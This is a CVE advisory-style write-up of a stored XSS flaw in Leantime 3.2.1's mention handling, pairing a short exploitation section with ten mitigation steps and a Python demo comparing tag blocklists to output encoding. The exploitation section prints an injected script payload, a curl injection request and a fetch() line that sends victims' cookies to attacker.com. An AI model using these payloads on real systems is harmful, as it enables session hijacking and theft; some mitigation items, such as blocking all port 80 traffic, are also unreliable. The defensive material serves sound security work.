How CVE-2025-28254 Works
CVE-2025-28254 is a stored Cross-Site Scripting (XSS) vulnerability in Leantime v3.2.1 and prior. The flaw exists in the `processMentions()` function, which fails to sanitize user-supplied input in the first name field. An authenticated attacker can inject malicious JavaScript payloads, which are then executed when other users view the manipulated content. This allows arbitrary code execution in the victim’s browser context, leading to session hijacking, data theft, or unauthorized actions. The vulnerability stems from improper input validation and output encoding, making it exploitable via simple POST requests.
DailyCVE Form
Platform: Leantime
Version: ≤ 3.2.1
Vulnerability: Stored XSS
Severity: Critical
Date: 03/28/2025
What Undercode Says:
Exploitation
1. Payload Injection:
<script>alert(document.cookie)</script>
Inserted into the first name field during profile update or mention creation.
2. CURL Exploit:
curl -X POST -d "firstName=<script>malicious_code</script>" http://leantime/api/processMentions --cookie "sessionid=ATTACKER_SESSION"
3. Exfiltrate Data:
fetch('https://attacker.com/steal?data=' + btoa(document.cookie));
Protection
1. Input Sanitization:
$firstName = htmlspecialchars($_POST['firstName'], ENT_QUOTES, 'UTF-8');
2. Content Security Policy (CSP):
Content-Security-Policy: default-src 'self'; script-src 'self'
(Allowing 'unsafe-inline' or 'unsafe-eval' in script-src would let the injected script run and defeat the policy.)
3. Patch Upgrade:
composer update leantime/leantime
4. WAF Rules:
location /api/ { modsecurity on; modsecurity_rules 'SecRule ARGS "@detectXSS" "id:1001,phase:2,deny,status:403"'; }
(ModSecurity rejects a rule without an id; 1001 is a placeholder, pick an id outside the ranges used by your rule sets.)
5. Session Hardening:
ini_set('session.cookie_httponly', 1); ini_set('session.cookie_secure', 1);
6. Output Encoding:
{{ user.firstName | escape('html') }}
(Use the 'html' strategy where the name lands in element content or attributes; 'js' is only correct inside a script block.)
7. Logging Suspicious Activity:
grep -iE "(<|%3C)script" /var/log/leantime/access.log
(Matches both raw and URL-encoded tags in any case; since POST bodies are not written to the access log, also check the stored first-name values in the database or application logs.)
8. Exploit Detection:
import re
if re.search(r'<script[^>]*>', input_string, re.IGNORECASE): raise ValueError("XSS Attempt Blocked")
(The original pattern '<script.?>' allowed at most one character before '>', so any tag with attributes or uppercase letters slipped past; even fixed, a tag blocklist is a stopgap next to output encoding.)
9. Backup Mitigation:
UPDATE users SET firstName = REPLACE(firstName, '<script>', '') WHERE firstName LIKE '%<%';
10. Network Isolation:
iptables -A INPUT -p tcp --dport 80 -j DROP
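To show why a tag blocklist like item 8 is weaker than the output encoding of items 1 and 6, here is an added Python example; it is not Leantime code, and the sample names, the `render_mention` wrapper and the helper names are constructed for illustration.

```python
import html
import re

# Constructed sample values for the first-name field (not taken from Leantime).
SAMPLE_NAMES = [
    "Alice",
    "<script>alert(1)</script>",
    '<SCRIPT type="text/javascript">alert(1)</SCRIPT>',
    '<img src=x onerror="alert(1)">',
    "O'Brien & Co",
]

def weak_script_check(value: str) -> bool:
    """Blocklist with '<script.?>': '.?' allows at most one character before
    '>', so a tag with attributes or different case slips through."""
    return re.search(r"<script.?>", value) is not None

def tag_blocklist_check(value: str) -> bool:
    """Tighter tag blocklist in the style of item 8: case-insensitive and
    tolerant of attributes. Still blind to event handlers on other tags."""
    return re.search(r"<script[^>]*>", value, re.IGNORECASE) is not None

def render_mention(first_name: str) -> str:
    """Output encoding (items 1 and 6): escape the stored value for an HTML
    element body, so any markup inside the name is shown as literal text."""
    safe = html.escape(first_name, quote=True)  # encodes & < > " '
    return f'<span class="mention">@{safe}</span>'

PREFIX, SUFFIX = '<span class="mention">@', "</span>"

def is_inert(rendered: str) -> bool:
    """True when the only markup in the rendered string is the wrapper span."""
    inner = rendered[len(PREFIX):len(rendered) - len(SUFFIX)]
    return (rendered.startswith(PREFIX) and rendered.endswith(SUFFIX)
            and "<" not in inner and ">" not in inner)

def report() -> dict:
    """Per sample: (weak blocklist hit, tighter blocklist hit, encoded output inert)."""
    return {
        name: (weak_script_check(name), tag_blocklist_check(name),
               is_inert(render_mention(name)))
        for name in SAMPLE_NAMES
    }

if __name__ == "__main__":
    for name, (weak, tight, inert) in report().items():
        print(f"{name!r:55} weak={weak!s:5} blocklist={tight!s:5} encoded_inert={inert}")
```

Both blocklists miss the `img` sample entirely, while every rendered value is inert because the encoding never depends on recognising the payload.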
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-28254
Extra Source Hub:
Undercode